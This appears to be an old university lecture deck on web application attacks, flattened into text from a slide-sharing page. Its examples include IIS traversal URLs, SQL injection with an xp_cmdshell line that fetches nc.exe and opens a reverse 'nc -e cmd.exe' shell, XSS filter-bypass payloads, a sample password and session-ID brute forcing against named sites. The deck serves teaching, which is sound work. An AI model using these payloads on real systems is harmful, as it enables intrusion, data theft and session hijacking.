Date post: | 26-Dec-2015 |
Category: |
Documents |
Upload: | cuthbert-charles |
View: | 243 times |
Download: | 6 times |
Network SecurityNetwork SecurityPart II: AttacksPart II: Attacks
Web AttacksWeb Attacks
Overview
• Web Architecture• Web Hack Attacks
Web ArchitectureWeb Architecture
• Web applications are important and this importance is accelerating
• Web applications are complex and this complexity is accelerating
This is Not NewThis is Not New•Problems with web applications are the
same problems with standalone applications
Why Target the WebWhy Target the Web
• Everyone is using it• Safe bet the protocol will not become
obsolete anytime soon• New technology is being implemented/
retrofitted on top (e.g. SOAP, WebDAV)• It’s everywhere! Mobile phones, cars,
watches, toasters…• Protocol fundamentally not suited to do
a majority of what it’s doing today
The Trouble with HTTPThe Trouble with HTTP
• Multitude of involved technologies• The involved protocols are extremely
simple; therefore, it is easy to (mis)code services on your own HTTP server
• Lack of experience coding public service type, multi-user applications
• Stateless nature makes transaction based systems tricky
How Did We Get Here?How Did We Get Here?
• Unskilled/robotic programmers (“code mills”)
• Lack of security-oriented programming training
• Tendency to ‘code now, fix later’• Current tools make it very easy to code
insecurely• Misconceptions about what ‘security’
really involves
Trouble Prone Areas of Trouble Prone Areas of the Webthe Web
• Buffer overflows– Classic bug that’s been exploited for quite a
while– Lack of bounds-checking in the language a
majority of web applications are written in combined with poor programming practice
– Can exist in the web server, application server, database server, or the CGI programs
– Fortunately it’s a well-advertised problem– Many scripting languages (ASP, PHP,
Perl, .NET, etc) are generally immune, as they have auto-expanding elements
Trouble Prone Areas of Trouble Prone Areas of the Webthe Web
• Cross-site scripting– Reprinting user data without filtering it for
web-specific characters– Potential to trick users into executing java
script in vulnerable site’s context– Partly a ‘social engineering’ technique– More of a liability than a vulnerability—it’s a
way to hack the users, not the server
Trouble Prone Areas of Trouble Prone Areas of the Webthe Web
• SQL tampering– Web server already has/allows access to the
database server– Attacker can cause arbitrary SQL to be executed– Results vary from data exposure to full system
compromise– Does not require direct database access!– Many applications are vulnerable– Stems from CGIs/scripts making assumptions
about user input and not double checking/filtering
Trouble Prone Areas of Trouble Prone Areas of the Webthe Web
• File includes– It’s common for a CGI to open and display or
manipulate the contents of a file on the server
– If the filename is composed of user-supplied elements, an attacker may be able to trick the server into opening another file
– Can lead to info disclosure or script or command execution
Trouble Prone Areas of Trouble Prone Areas of the Webthe Web
• Authentication weaknesses– CGIs can fail to check credentials with every
request– Thus you bypass the login script and directly
access the following scripts, without needing username/password
– Or, certain actions/functions may not check for the proper authentication
Trouble Prone Areas of Trouble Prone Areas of the Webthe Web
• Weak session mechanism– The session/state mechanism uses
predictable token IDs– Or, the ID keyspace is too small for the
number of users– Either way, an attacker can ‘guess’ a valid
token and hijack the session
Mid Range E-Commerce Mid Range E-Commerce Roll-OutRoll-Out
• Web Server• Application Server• Database Server• … and a Firewall• Maybe some options…
– Load Balancer– Reverse Proxy servers– Cache systems
Typical Web Application Typical Web Application Set-UpSet-Up
WebServer
DB
DB
Web app
WebClient Web app
Web app
Web app
HTTPrequest
(cleartext or SSL)
HTTP reply(HTML,
Javascript, VBscript,
etc)
Plugins:•Perl•C/C++•JSP, etc
Database connection:•ADO,•ODBC, etc.
SQL Database
•Apache•IIS•Netscape etc…
Firewall
Traditional HackingTraditional Hacking
• Targeted against vulnerabilities in OS components and Network services.– Buffer overflows
• Not portable; attacks specific to operating system architecture, authentication, services, etc.
• Myriad of exploits for different services, OS platforms, CPU architectures, etc.
Traditional HackingTraditional Hacking
• Requires specialized coding skills such as writing shell-code for buffer-overflows, etc.
• In short, it is a complex activity with a limited practitioner base.
...winsock_found:
xor eax, eaxpush eaxinc eaxpush eaxinc eaxpush eaxcall socketcmp eax, -1jnz socket_ok
push sockerrlpush offset sockerrcall write_consolejmp quit2
socket_ok:mov sock, eaxmov sin.sin_family, 2mov esi, offset _port
...
Limitations of Limitations of Traditional Hacking…Traditional Hacking…
• Modern network architectures are getting more robust and secure.
• Firewalls being used in almost all network roll-outs.
• OS vendors learning from past mistakes (?) and coming out with patches rapidly.
• Increased maturity in coding practices.
Utility of FirewallsUtility of Firewalls
WebServer
DB
DB
Web app
Web app
Web app
Web app
SQL Database
Firewall
wu-ftpdSun RPC
NT ipc$XXX
Hacks on OS Hacks on OS network network services services
prevented by prevented by firewallsfirewalls
Limits Traditional hacking
Utility of FirewallsUtility of Firewalls
WebServer
Web app
DB
DB
Web app
Web app
Web app
SQL Database
Firewall
X
Internal back-end application servers are on a non-routable IP network.
(Private Addresses)
Utility of FirewallsUtility of Firewalls
WebServer
Web app
DB
DB
Web app
Web app
Web app
SQL Database
Firewall
XOutbound access
restricted. Why would a web server telnet
out?
Futility of FirewallsFutility of Firewalls
• Web traffic is the most commonly allowed of any of the protocols through enterprise firewalls.
• HTTP is perceived as friendly traffic• Why lay siege to the wall when you have
a open door.• Attacks that based on
Content/Applications applications are still viewed by some as rare.
Tools Required for Web Tools Required for Web HackingHacking
• A web browser• An Internet connection• ….a clear mind and some spare time!
A Classification of Web A Classification of Web HacksHacks
• Web attacks fall under the following general categories:– Buffer overflow attacks– SQL injection attacks– Input validation attacks– URL interpretation attacks– Impersonation attacks
Firewalls Cannot Firewalls Cannot Prevent…Prevent…
WebServer
WebClient
Web server misconfiguration
Firewall
• Complexity Complexity mismanagementmismanagement
• IndifferenceIndifference
Attack the ArchitectureAttack the Architecture
Java Runtime
WebServer
htmlhandler
html
jsp
text/htmlheader
/bin/sh
includefile
shtml
text/htmlheader
ProcessSSI tags
#exec#include
script/execu--table
ProcessJSP tags
JavaCompiler
class
shtmlhandler
jsphandler
defaulthandler
cgihandler
text/htmlheader
cgish,perl,…
??
Web Server Architecture Web Server Architecture AttacksAttacks
• Complex web server architectures are can lead to implementation vulnerabilities.
• A common attack is to bypass the web server configuration directives, and invoke the built-in procedures directly.
• A close look at the web server architecture can reveal security problems.
Architecture Architecture MisconfigurationsMisconfigurations
• Handler Forcing:– Certain mis-configurations allow handlers to
be forced onto files that are not supposed to be processed by them.
– Forcing a default handler onto a CGI file can cause the contents of the CGI file to be returned “as-is”.
• Forcing a JSP handler onto an HTML file can cause the contents of the HTML file to be compiled by the Java compiler and executed by the Java run-time machine
JSP Handler ForcingJSP Handler Forcing
WebServer
ProcessJSP tags
JavaCompiler
class
jsphandler
htmlhandler
htmltext/htmlheader
JSP PageCompile
handler forced on to html files
Java Runtime
Firewalls Cannot Firewalls Cannot Prevent…Prevent…
WebServer
WebClient
Poor checking of user inputs
Web app
Web app
Web app
Web app
URLInterpretation attacks
Firewall
• Input validation attacks
URL Interpretation URL Interpretation AttacksAttacks
• Several well known vulnerabilities in Windows NT and Internet Information Services dating from Autumn 2000, have been wrapped into a common definition: "The Unicode Bug."
• URL Parsing vulnerability.• Improper handling of illegal Unicode sequences.• Allows remote users to execute arbitrary
commands on the web server under the context of IUSR.
• Can lead to potential Administrator level access.
The IIS Unicode BugThe IIS Unicode Bug
• Exploit:http://10.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
– attacker could view a directory listing of a server's C:\ drive
• %c0%af = “/”• Can use HTTP POST to send
multiple commands at a time to cmd.exe.
Web Hacking for Collateral Web Hacking for Collateral DamageDamage
• Web hacking can result in three types of collateral damage.
1. Information disclosure (paths etc.)• Arbitrary file content and source code leakage
2. Data disclosure (i.e. return all rows)3. Arbitrary command execution
Source Code DisclosureSource Code Disclosure
"Use the Source, Luke!“
• WebLogic / WebSphere “JSP” bug1. • Ability to retrieve source code of
JSP/JHTML files.• Using uppercase “JSP” in the URL causes
the server to return unparsed JSP code.
1. Discovered by Shreeraj Shah, Foundstone.
A Classic Case of “Handler A Classic Case of “Handler Mismatch." Mismatch."
Java Runtime
index.jspProcessJSP tags
JavaCompiler
jsphandler
defaulthandler
index.JSP = index.jsp
htmlhandler
shtmlhandler
jhtmlhandler
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet
weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet
weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet
HTTP Request:index.JSP
Web
Logi
c S
erve
r
XX
More Source DisclosureMore Source Disclosure
• URL prefixes for source code disclosure1:/servlet/file/ (IBM WebSphere)/file/ (BEA WebLogic)/*.shtml/ (BEA WebLogic)/ConsoleHelp/ (BEA WebLogic)/servlet/com.sun.server.http.servlet.FileServlet/
(Sun JavaWebServer)
1 Advisories located on: http://www.foundstone.com/advisories.htm
……I Thought it was I Thought it was FunctionalityFunctionality
• IIS “+.htr” bug.– View source code of ASP/ASA files.– URL interpretation vulnerability.
http://10.0.0.1/global.asa+.htr
– “.htr” causes ISM.DLL to handle the URL.– Characters after the “+” sign (space) are
ignored.
Doom on You….Doom on You….
<SCRIPT LANGUAGE="VBScript" RUNAT="Server">Sub Application_OnStart Set Db = Server.CreateObject("Commerce.DbServer") Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c" Db.Application = "http://10.1.1.16/" Set Application("Db") = DbEnd SubSub Session_OnStart '==Visual InterDev Generated - DataConnection startspan== '--Project Data Connection Session("DataConn_ConnectionString") = "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25; FIL=MS Access;MaxBufferSize=512;PageTimeout=5;" Session("DataConn_ConnectionTimeout") = 15 Session("DataConn_CommandTimeout") = 30 Session("DataConn_RuntimeUserName") = "" Session("DataConn_RuntimePassword") = "" '==Visual InterDev Generated - DataConnection endspan==End Sub</SCRIPT>
User ID: sa
Password: n0t4u2c
More Source DisclosureMore Source Disclosure
• Some applications access files without appropriate checking.
• Input validation vulnerability.• No checking performed for file type or
location.• Filenames can be manipulated via
parameters passed on the URL or as hidden fields.
NT IIS Showcode ASP NT IIS Showcode ASP VulnerabilityVulnerability
• Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0
• Gives remote users access to view any file on the same volume as the web server that is readable by the web server.
http://www.someserver.com/msadc/Samples/SELECTOR/Showcode
asp?source=/msadc/Samples/../../../../../boot.ini
Firewalls Cannot Firewalls Cannot Prevent…Prevent…
WebServer
DB
DB
Web app
WebClient Web app
Web app
Web app
HTTPrequest
(cleartext or SSL)
Input validation attacks
Extend SQL statements
SQL Database
URL Interpretation attacks
Firewall
• SQL Query Poisoning
SQL Query PoisoningSQL Query Poisoning
• Poor input validation on parameters passed to SQL queries can be disastrous.
• Return all rows:http://10.0.0.3/showtable.asp?ID=3+OR+1=1
• Resultant query:SELECT * FROM PRODUCT WHERE ID=3 OR 1=1
SQL Query PoisoningSQL Query Poisoning
• Drop Table:http://10.0.0.3/showtable.asp?ID=3%01DROP+TABLE+PRODUCT
• Resultant query:SELECT * FROM PRODUCT WHERE ID=3 DROP TABLE PRODUCT
SQL Query PoisoningSQL Query Poisoning
• Remote Command Execution!http://10.0.0.3/showtable.asp? ID=3%01EXEC+master..xp_cmdshell+
‘tftp+-i+10.0.0.13+GET+nc.exe+
%26%26+nc+-e+cmd.exe+10.0.0.11+2000’
• Command executed:tftp -i 10.0.0.13 GET nc.exe &&
nc -e cmd.exe 10.0.0.11 2000
SQL Remote CommandoSQL Remote Commando
IIS
DBASP
tftpserver
nc.exe
WebBrowser
C:\>_
1
23
listener at port 2001 to receive the connection
tftp server to get nc.exe transferred over to the NT IIS box.
SELECT * FROM PRODUCT WHERE ID=3EXEC master..xp_cmdshell tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000
Firewalls Cannot Firewalls Cannot Prevent…Prevent…
WebServer
DB
DB
Web app
WebClient Web app
Web app
Web app
Reverse engineering HTTP
cookies
Input validation attacks
SQL query poisoning
SQL Database
URL Interpretation attacks
Firewall
HTTP session hijacking
•Impersonation
Firewalls Cannot Firewalls Cannot Prevent…Prevent…
WebServer
DB
DB
Web app
WebClient Web app
Web app
Web app
HTTPrequest
(cleartext or SSL)
HTTP reply(HTML,
Javascript, VBscript,
etc)
Plugins:•Perl•C/C++•JSP, etc
Database connection:•ADO,•ODBC, etc.
SQL Database
•Apache•IIS•Netscape etc…
Firewall
•Application bugs
The MDAC AttackThe MDAC Attack• Vulnerability with Microsoft Data Access
Components (msadcs.dll).• MDAC allows remote users to perform
SQL queries without authentication.• Only the DSN needs to be known.• SQL queries can be crafted to execute
arbitrary commands.
The MDAC AttackThe MDAC AttackClient Server
Internet Explorer
or VB.exe
RDS Data
Control
OBDC Provider
RDS Data
Space
Custom Business Objects
RDS
Data Factory
ASP
(ADO)
Jet Provider Jet
3.5
OBDC
Remote Data Service
URL
HTML
OLE
DB
IIS
Server
msadcs.dll
The MDAC AttackThe MDAC Attack
• Exploit:
$query="Select * from Customerswhere City='|shell(\"$command\")|'";
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}
• Gain Administrator Privileges on NT!
The MDAC Attack in The MDAC Attack in ActionAction
IIS 4.0
DBmsadcs
dll
tftpserver
nc.exe
mdac.pl(exploit)
C:\>_
1
23
listener at port 2001 to receive the connection
tftp server to get nc.exe transferred over to the NT IIS box.
SELECT * FROM Customers WHERECity = “|shell($command)
The Effectiveness of Web The Effectiveness of Web HackingHacking
• By default ports 80 and 443 are usually allowed through firewalls. The open door…
• A single URL string is able to be processed by many different components.
• In most cases the only defense is reliance on secure coding.
Missile of DeathMissile of Death
WebServer
DB
DB
Web app
Web app
Web app
Web app
http: // 10.0.0.1 / catalog / display.asp ? pg = 1 & product = 7
Cross Site Scripting, Cross Site Scripting, Why You Should Care.Why You Should Care.
•XSS is not an attack on the server, it is an attack on the users of your application
•So what?– Identity theft– User masquerading – Reputation Risk
Cross Site Scripting Cross Site Scripting (XSS)(XSS)
•Found in 98% of applications•2 main types
– Transient (URL basedPhttp://badapp.com/error.jsp?msg=<SCRIPT>alert("Test");</SCRIPT>
– Sticky – Script placed in a static bit of web content
XSS continued…XSS continued…
•Transient generally requires user interaction
•What can happen?– Possibilities are only restricted by the client– Cookie theft most common example
•But I filter “<“ and “>”– Jscript entities “&{alert(‘Test')};”
Session HijackingSession Hijacking
•HTTP is stateless so application designers must build a way to track state
•Cookies and URL strings are the most common ways to track state
•Both are easily exploitable
Session Hijacking Session Hijacking Continued…Continued…
•Generally the next thing to occur after XSS
•Examples of common session tracking issues
Parameter TamperingParameter Tampering
•Programmers will store data anywhere!– URL parameters
http://badapp.com/checkout.pl?p=$1.00– Cookies – Cookie:p=$1.00– Hidden fields – not really hidden
Unbound File CallsUnbound File Calls
•Ye Ole’ ../../•Becomes an issue with the display
important information (global.asa)•Most application languages will take
URL’s as file arguments
Do You Know Where Do You Know Where Your Data is?Your Data is?
•Building an exclusionary filter is difficult because your data is all over the place
Data Flow ExampleData Flow Example
Internet
Customer Service
Database
Marketing Database
Database
Orders Database
www.hackme.com
Designing a proper Designing a proper filterfilter
•Make all filters default deny– Don’t try to exclude “bad stuff”
•Requires a good idea where your data is going
•Log all filter violations
Filter Bypassing is a Filter Bypassing is a Technique to Evade Technique to Evade
Detection by Filtering Detection by Filtering Systems.Systems. • Filter Bypassing techniques come in many varieties
when applied to the many facets of web application security.
• The general idea of performing the various techniques described is to successfully bypass security measures designed to prevent certain types/amounts/values of data from being passed into a given system.
• Many of the described techniques can be highly effective when used properly and even become more powerful when used in combination.
Most filter systems are Most filter systems are very simplevery simple
Seven forms of ingenuity:• URL Encoded Strings• Double Hex Encoding• Unicode Encoded String• Long URLs• Case Sensitivity• XSS Filter-Bypass Manipulation• Null Character Injection
The Hex AdvantageThe Hex Advantage
By URL hex encoding URL strings, it may be possiblecircumvent filter security systems and IDS.
http://foo.com/cgi?file=/etc/passwd
Can become:
http://foo.com/cgi?file=/%2F%65%74%63
%2F%70%61%73%73%77%64
Double Hex EncodingDouble Hex Encoding
• In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability.
• The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL.
• An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit a vulnerability.
• When an un-patched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL.
• IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding.
• This secondary decoding was the source of another Vulnerability.
IIS Double HexIIS Double Hex
Round 1 Decoding:scripts/..%255c../winntbecomes:scripts/..%5c../winnt(%25 = “%” Character)
Round 2 Decoding:scripts/..%5c../winntbecomes:scripts/..\../winnt
Directory path traversal is now possible using path obfuscation through Double
Hex Encoding.
The Unicode SlashThe Unicode Slash• In unicode, “%c0%af”, is the equivilent to a
slash (“/”). • Therefore the common URL IIS exploit:
scripts/..%c0%af../winnt
• becomes: scripts/../../winnt
Once again, directory path traversal is now possible using path obfuscation
through Unicode.
Double SlashDouble Slash
•Double Slash using multiple directory slashes in URLs. For example: http://www.foo.com/..//etc//passwd.
•Can be used to move under the radar of IDS systems and still function properly.
•Many system put limits on how much data a variable can store or a system can handle.
•Often times if these limits are exceeded, the data will still be used, but bypass certain security considerations.
• URL’s such as:http://www.foo.com/cgi?param=filename
• Replaced with: http://www.foo.com/cgi?param=<2K_of_Data>
Long URL’sLong URL’s
Case SensitivityCase Sensitivity
• Case sensitivity may play a roll in many security filtration systems.
• Alternating case on URL parameters may be used to bypass certain restrictions.
http://foo.com/cgi?param=barhttp://foo.com/cgi?param=BaRhttp://foo.com/CGI?param=BAR
Method SwitchingMethod Switching
• Many web applications do not properly perform HTTP Request Method sanity checking.
• Performing Method Switching can be used to bypass IDS, logging features and CGI security mechanisms.
• Most web servers do not log "POST" data and thus forensic analysis is harder to perform.
The Request Method: GET /cgi-bin/some.cgi
can become: POST /cgi-bin/some.cgi
The Method token indicates the method to be performed on the resource identified by the Request-URI.
HTTP 1.1 MethodsHTTP 1.1 Methods
• OPTIONS• GET• HEAD• POST • PUT• DELETE• TRACE• CONNECT
Using your “HEAD”Using your “HEAD”
• The “HEAD” request method can be used to determine if a particular HTTP resource is accessible without actually downloading the resource data.
Scans and web application attacks can be made to be more effective using this technique.
Null Character InjectionNull Character Injection• Hex encoded null characters
can be used to thwart some security mechanisms.
• This happens because in the “C” programming language, a null character designates the end of a string.
• So If a CGI appending a “.html” to an input parameter:http://foo.com/cgi?file=../../etc/passwd%00
• Will cut off appending “.html”.
Unicode (UTF-8) Unicode (UTF-8) EncodedEncoded
• Unicode is a universal way to represent characters.
• However, unicode can also be used to circumvent security mechanisms by representing information in another fashion.
• Microsoft IIS has had security issues in the past while supporting unicode.
URL Encoded StringURL Encoded String
• The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it limits the use of allowed characters in URLs to only a limited subset of the US-ASCII character set:
• "...Only alphanumerics [0-9a-zA-Z], the special characters "$_.+!*'()," [not including the quotes - ed], and reserved characters used for their reserved purposes may be used unencoded within a URL."
XSS Filter-Bypass XSS Filter-Bypass ManipulationManipulation
• This technique is used pass various types of client-side scripting language through implemented security filters.
• The idea is to be able to achieve client-side execution of a client-side script.
• There are several techniques used to perform this attack.
Hammer the FiltersHammer the Filters
•Submit all the raw HTML tags you can find, and then view the output results.
•Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript Event Handler).
•This will show what HTML is allowed, what the changes were, and possible dangerous HTML that can be exploited.
SRCing the ProtocolSRCing the Protocol
•Using the “javascript” protocol in an HTML source attribute.
<IMG SRC="javascript:js_expression">
<IMG SRC="javascript:alert('test');">
Alternate Protocol Alternate Protocol SRCingSRCing
•Same technique as the previous, however, using the protocol “livescript” and “mocha” will yield the same effect.
<IMG SRC=“livescript:js_expression">
<IMG SRC=“mocha:alert('test');">
Decimal HTML EntitiesDecimal HTML Entities
•Variation on previous techniques, using decimal HTML entities between the protocol characters can be used to bypass filters, yet still execute JavaScript.<IMG SRC=“java
script:js_expression">
•\09 \10 \11 \12 \13 have all been seen to work
Hex HTML EntitiesHex HTML Entities
•Another variation on the previous example, HEX HTML entities may also be used to bypass filter restriction, yet execute JavaScript.<IMG SRC=“java
script:js_expression">
Padding HTML EntitiesPadding HTML Entities
•Padding HTML entities with “0’s” may also be used to bypass the filters, yet still execute JavaScript.
<IMG SRC=“java	script:js_expression">
STYLE JavaScript TypeSTYLE JavaScript Type•Changing the MIME-TYPE on a “style” tag
may be used to execute JavaScript.
<style TYPE="text/javascript">JS EXPRESSION</style>
<style TYPE="text/javascript">Alert(document.domain);</style>
STYLE JavaScript X-STYLE JavaScript X-TypeType
•Variation on the previous example, but by using the “application/x-javascript” MIME-TYPE, the filters may be bypassed.
<STYLE TYPE="application/x-javascript">
alert('JavaScript has been Executed');
</STYLE>
STYLE JavaScript STYLE JavaScript ImportImport
•Using the @import feature in CSS may be used to perform JavaScript protocol SRCing.
<style TYPE="text/css">
@import url(javascript:alert('Javascript is executed'));
</style>
STYLE URL ImportSTYLE URL Import
•Using the @import feature in CSS can also be used to import JavaScript from another HTTP resource.
<STYLE type=text/css>
@import url(http://www.test.com);
</STYLE>
LINK Style SheetLINK Style Sheet
•The “LINK” tag can be used to import JavaScript from a remote HTTP resource.
<LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js">
Style Left ExpressionStyle Left Expression
•A few CSS features used together to execute JavaScript.
<PSTYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))" >
Remote SRCingRemote SRCing
•A few HTML tags, such as “LAYER”, “ILAYER”, “FRAME”, and “IFRAME” can be used to src in JavaScript from remote resources.
<LAYER SRC="js.html"></LAYER>
<LAYER SRC="js.html"></LAYER>
……AND CURLYAND CURLY
<IMG SRC="&{javascript_expression};">
<IMG SRC="&{alert(‘alert’)};">
•Syntax must be exact.
Dangerous HTML TagsDangerous HTML Tags
•“All HTML is to be considered dangerous, but these tags are the most insidious.”
– <APPLET>– <BODY>– <EMBED>– <FRAME>– <FRAMESET>– <HTML>– <IFRAME>– <IMG>– <LAYER>– <ILAYER>– <META>– <OBJECT>– <SCRIPT>– <STYLE>
Dangerous HTML Dangerous HTML AttributesAttributes
•(HTML Tags with these attributes.)– SRC– LOWSRC– STYLE– HREF
Web Applications LoginsWeb Applications Logins
Traditional Brute ForceTraditional Brute Force
guest
Admin
123123
Password
Etc.
Session ID OverviewSession ID Overview
•HTTP is stateless protocol•Rather than make a user authenticate
upon each click in a web application, a sense of “state” is created
•In order to maintain state, a shared string, token, or secret between HTTP client and server is usually used by developers
•Essentially, authentication data (username/password) exchanged for “Session ID”
Web State AttacksWeb State Attacks
•Session Replay– A traditional replay attack in the cryptography
sense is an attack in which a valid data transmission is maliciously or fraudulently repeated, either by the originator or by an adversary who intercepts the data and retransmits it.
•Session Hijacking– Seizing control of a legitimate user's web
application session while that user is “logged in” to the application
Session IDSession ID
• Session ID should IN THEORY be just as secure as username/password
Session ID OverviewSession ID Overview
• While it is generally clear that username/password pairs are indeed authentication data and therefore sensitive, it is not generally understood that session IDs are also just as sensitive because of their frequent use for authentication. See RFC 2964 (Use of HTTP State Management).
Session ID OverviewSession ID Overview
• Session IDs are commonly stored in cookies and/or URLs, and hidden fields of web pages (or some combination)
• Session ID generated by WEB SERVER (IIS, etc.) when the user first hits the site or by WEB APPLICATION (ATG dynamo, Apache Tomcat, BEA Websphere, .jsp, .asp, perl, etc.) when the user logs in
Cookie RefresherCookie Refresher
• Sometimes the cookies are set to expire (i.e., be deleted) upon closing the browser; these are typically called “session cookies” or “non-persistent” cookies
• Persistent cookies last beyond a user’s session (i.e. “Remember Me” option)
• Persistent cookies are usually stored on the user’s hard drive in a location according to the particular operating system and browser (e.g. , C:\Program files\netscape \users\username\cookies.txt for Netscape and C:\Documents and Settings \username\Cookies for IE on Win2K).
Cookie RefresherCookie Refresher•Cookie Refresher (RFC 2965)
1.) domain: The website domain that created and that can read the variable. 2.) flag: A TRUE/FALSE value indicating whether all machines within a given domain can
access the variable.3.) path: Pathname of the URL(s) capable of accessing the cookie from the domain.4.) secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed
to access the variable. 5.) expiration: The Unix time that the variable will expire on. Unix time is defined as the
number of seconds since 00:00:00 GMT on Jan 1, 1970. Omitting the expiration date signals to the browser to store the cookie only in memory; it will be erased when the browser is closed. (expires July 27, 2006)
6.) name: The name of the Session ID variable (in this case Apache).
7.) value: The value of the Session ID variable (in this case 64.3.40.151.16018996349247480 ) .
www.redhat.com FALSE / FALSE 1154029490 Apache 64.3.40.151.16018996349247480
1 2 3 4 5 6 7
Cookie Stored Session ID Cookie Stored Session ID ExamplesExamples
.www.ibm.com TRUE /rc FALSE 1293768100 sauidp p0010000000006DCC10255298230000591992.003F75FEF2
.yahoo.com TRUE / FALSE 1271361612 B 3qpaarsu48dai&b=2
.amazon.com FALSE / FALSE 1026115299 session-id 103-1456769-7895034
.ebay.com TRUE / FALSE 1183296824 lucky8 694036
.starwars.com TRUE / FALSE 1341753778 Wookie-Cookie
13fe8fff4799f27dcf19c959dafa8437
.yahoo.com TRUE / FALSE 1154029490 I ir=9p&in=4aweec66&i1=AFABCl
.yahoo.com TRUE / FALSE 1154029490 PU t=1
URL Stored Session IDURL Stored Session ID
• http://www.123greetings.com/view/7AD30725122120803 • http://evite.citysearch.com/r?iid=KVIJBUFDLPVMIVLXYUKB • http://view.greetings.yahoo.com/greet/view?FXA96K95JAEJS• http://www.atg.com/en/index.jhtml;jsessionid=HYMJK3PJUSJ4CCQCQBJCGWQKAKAFUIV0?_requestid=21122
• http://www.amazon.com/exec/obidos/subst/home/home.html/102-4524380-3923344
Session IDs in HTML Session IDs in HTML Hidden FieldsHidden Fields
<FORM METHOD=POST ACTION="/cgi-bin/bankonline.cgi">
<input type="hidden" name="sessionID" value=”abcde1234”>
<input type="hidden" name="useraccount" value=”673-12745”>
<input type="submit" name="Access My Bank Information"></form>
Session ID Session ID SecuritySecurity Overview Overview
Session ID security is a microcosm of Web Application Security.
Web Application Security cuts through many different aspects of an organization’s information security infrastructure
An Example: Brute Forcing Session An Example: Brute Forcing Session ID’s in URLSID’s in URLS
Dear Terry Gillette, An Anonymous Admirer has sent you a greeting card from 123Greetings.com, a FREE service committed to keep people in touch. To see your greeting card, choose from any of the following options which works best for you. --------Method 1-------- Just click on the following Internet address (if that doesn't work for you, copy & paste the address onto your browser's address box.)
http://www30.123greetings.com/card/08/01/05/20/BG20801052002282.html
An Example: Brute An Example: Brute Forcing Session ID’s in Forcing Session ID’s in
URLSURLShttp://www.123greetings.com/view/AD30725122116211
http://www.123greetings.com/view/AD30725122118909
http://www.123greetings.com/view/AD30725122120803
http://www.123greetings.com/view/AD30725122122507
http://www.123greetings.com/view/AD30725122124100
As we start to associate that the date we sent these electronic cards on was July 25 at 12:21 PST, we can start to eliminate some more entropy out of this session ID (07251221). Notice then that we’re left with five incrementing “random” digits at the end of the URL. http://www.123greetings.com/view/AD30725122116211http://www.123greetings.com/view/AD30725122118909http://www.123greetings.com/view/AD30725122120803http://www.123greetings.com/view/AD30725122122507http://www.123greetings.com/view/AD30725122124100
An Example: Brute Forcing An Example: Brute Forcing Session ID’s in URLS Session ID’s in URLS AUTOMATED DEMO!AUTOMATED DEMO!
Why Brute Forcing Web Why Brute Forcing Web Session ID’s is BadSession ID’s is Bad
• Can result in an online user’s web application account being hijacked or loss of privacy
• Easy to exploit• Unlike typical login scenario, no failed login
lockout• Prevalent disclosure among security mailing lists• Typical security solutions (firewalls, IDS, etc.) do
nothing to detect attacks• Log data is usually not that detailed• IDS is not well developed for Web Application
attacks• SSL (Server side) does nothing to protect
against these attacks
In the NewsIn the News– “Privacy hole found in Verizon
Wireless Web site “ Computerworld, Sept 6, 2001.http://www.computerworld.com/securitytopics/security/privacy/story/0,10801,63587,00.htmlhttp://online.securityfocus.com/archive/1/211520
– https://www.app.airtouch.com/jstage/plsql/ec_navigation_wrapper.nav_frame_display?p_session_id=3346178&p_host=ACTION
URL Example: Brute Forcing URL Example: Brute Forcing Register.comRegister.com
Thank you for using register.com's Domain Manager. To change or re-enter your password, please copy and paste the URL below into the "Location" or "Address" field of your web browser and hit the 'Enter' key on your keyboard. Note: If your e-mail program supports HTML, you may be able to click on the link below. http://mydomain.register.com/change_password.cgi?155218782787 Note: Above link will be expire within three days
Example 2: Brute Forcing Web Example 2: Brute Forcing Web Session ID’sSession ID’s
http://mydomain.register.com/change_password.cgi?486218782865http://mydomain.register.com/change_password.cgi?440218782891 http://mydomain.register.com/change_password.cgi?685218782917 http://mydomain.register.com/change_password.cgi?505218782956 http://mydomain.register.com/change_password.cgi?435218782969
http://mydomain.register.com/change_password.cgi?486218782865 http://mydomain.register.com/change_password.cgi?440218782891http://mydomain.register.com/change_password.cgi?685218782917http://mydomain.register.com/change_password.cgi?505218782956http://mydomain.register.com/change_password.cgi?435218782969
URL Example – Brute Forcing URL Example – Brute Forcing Dfilm.comDfilm.com
-----Original Message-----
From: [email protected] [mailto:[email protected]]
Sent: Monday, July 01, 2002 1:38 PM
Subject: D.FILM Digital Movie for Dave
Dave created a digital movie for you!
You can view it at the following URL:
http://mm.dfilm.com/mm2s/mm_route.php?id=110532
Cheers,
Dave and DFILM.
Be sure to check out the web site at http://www.dfilm.com
URL Example – Brute Forcing URL Example – Brute Forcing Dfilm.comDfilm.com
No privacy of other user’s creations:
http://mm.dfilm.com/mm2s/mm_route.php?id=110532
http://mm.dfilm.com/mm2s/mm_route.php?id=110531
http://mm.dfilm.com/mm2s/mm_route.php?id=110530
http://mm.dfilm.com/mm2s/mm_route.php?id=110529
http://mm.dfilm.com/mm2s/mm_route.php?id=110528
http://mm.dfilm.com/mm2s/mm_route.php?id=110527
http://mm.dfilm.com/mm2s/mm_route.php?id=110526
http://mm.dfilm.com/mm2s/mm_route.php?id=…
